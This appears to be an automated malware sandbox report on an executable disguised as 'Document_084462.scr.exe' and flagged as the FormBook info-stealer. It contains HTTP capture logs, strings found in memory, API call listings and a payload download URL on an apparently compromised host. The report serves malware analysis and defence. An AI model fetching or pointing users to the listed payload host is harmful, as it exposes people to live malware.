0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 18:00:12 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 18:00:15 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 18:00:18 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 18:00:21 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:27 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:29 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:32 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: Document_084462.scr.exe, 00000000.00000000.12521274336.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Document_084462.scr.exe, 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Document_084462.scr.exe, 00000001.00000000.12946377860.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Document_084462.scr.exe, 00000001.00000001.12948306647.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/
            Source: Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/)71
            Source: Document_084462.scr.exe, 00000001.00000002.13304887566.0000000036E50000.00000004.00001000.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/hEuJhxvbfOcCGqtagtOtF215.bin
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.11.20:49748 version: TLS 1.2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_00405595 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405595

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Document_084462.scr.exe
            Sample has a suspicious name (potential lure to open the executable)
            Source: Document_084462.scr.exeStatic file information: Suspicious name
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF34E0 NtCreateMutant,LdrInitializeThunk,1_2_37AF34E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2EB0 NtProtectVirtualMemory,LdrInitializeThunk,1_2_37AF2EB0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2D10 NtQuerySystemInformation,LdrInitializeThunk,1_2_37AF2D10
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2B90 NtFreeVirtualMemory,LdrInitializeThunk,1_2_37AF2B90
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2BC0 NtQueryInformationToken,LdrInitializeThunk,1_2_37AF2BC0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF3C90 NtOpenThread,1_2_37AF3C90
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF3C30 NtOpenProcessToken,1_2_37AF3C30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF38D0 NtGetContextThread,1_2_37AF38D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF4570 NtSuspendThread,1_2_37AF4570
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF4260 NtSetContextThread,1_2_37AF4260
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2FB0 NtSetValueKey,1_2_37AF2FB0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2F30 NtOpenDirectoryObject,1_2_37AF2F30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2F00 NtCreateFile,1_2_37AF2F00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2E80 NtCreateProcessEx,1_2_37AF2E80
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2EC0 NtQuerySection,1_2_37AF2EC0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2ED0 NtResumeThread,1_2_37AF2ED0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2E00 NtQueueApcThread,1_2_37AF2E00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2E50 NtCreateSection,1_2_37AF2E50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2DA0 NtReadVirtualMemory,1_2_37AF2DA0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2DC0 NtAdjustPrivilegesToken,1_2_37AF2DC0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2D50 NtWriteVirtualMemory,1_2_37AF2D50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2CF0 NtDelayExecution,1_2_37AF2CF0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2CD0 NtEnumerateKey,1_2_37AF2CD0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2C20 NtSetInformationFile,1_2_37AF2C20
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2C30 NtMapViewOfSection,1_2_37AF2C30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2C10 NtOpenProcess,1_2_37AF2C10
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2C50 NtUnmapViewOfSection,1_2_37AF2C50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2B80 NtCreateKey,1_2_37AF2B80
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2BE0 NtQueryVirtualMemory,1_2_37AF2BE0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2B20 NtQueryInformationProcess,1_2_37AF2B20
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2B00 NtQueryValueKey,1_2_37AF2B00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2B10 NtAllocateVirtualMemory,1_2_37AF2B10
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2AA0 NtQueryInformationFile,1_2_37AF2AA0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2A80 NtClose,1_2_37AF2A80
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2AC0 NtEnumerateValueKey,1_2_37AF2AC0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF2A10 NtWriteFile,1_2_37AF2A10
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF29F0 NtReadFile,1_2_37AF29F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF29D0 NtWaitForSingleObject,1_2_37AF29D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_00133609 NtSetContextThread,1_2_00133609
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0013392A NtSuspendThread,1_2_0013392A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_00133C4C NtResumeThread,1_2_00133C4C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2CF0 NtDelayExecution,LdrInitializeThunk,3_2_04AB2CF0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2C30 NtMapViewOfSection,LdrInitializeThunk,3_2_04AB2C30
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_04AB2D10
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2E50 NtCreateSection,LdrInitializeThunk,3_2_04AB2E50
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2F00 NtCreateFile,LdrInitializeThunk,3_2_04AB2F00
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB29F0 NtReadFile,LdrInitializeThunk,3_2_04AB29F0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2A80 NtClose,LdrInitializeThunk,3_2_04AB2A80
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2AC0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04AB2AC0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2A10 NtWriteFile,LdrInitializeThunk,3_2_04AB2A10
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2B80 NtCreateKey,LdrInitializeThunk,3_2_04AB2B80
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04AB2B90
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_04AB2BC0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2B00 NtQueryValueKey,LdrInitializeThunk,3_2_04AB2B00
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2B10 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04AB2B10
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB34E0 NtCreateMutant,LdrInitializeThunk,3_2_04AB34E0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB4570 NtSuspendThread,3_2_04AB4570
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB4260 NtSetContextThread,3_2_04AB4260
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2CD0 NtEnumerateKey,3_2_04AB2CD0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2C20 NtSetInformationFile,3_2_04AB2C20
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2C10 NtOpenProcess,3_2_04AB2C10
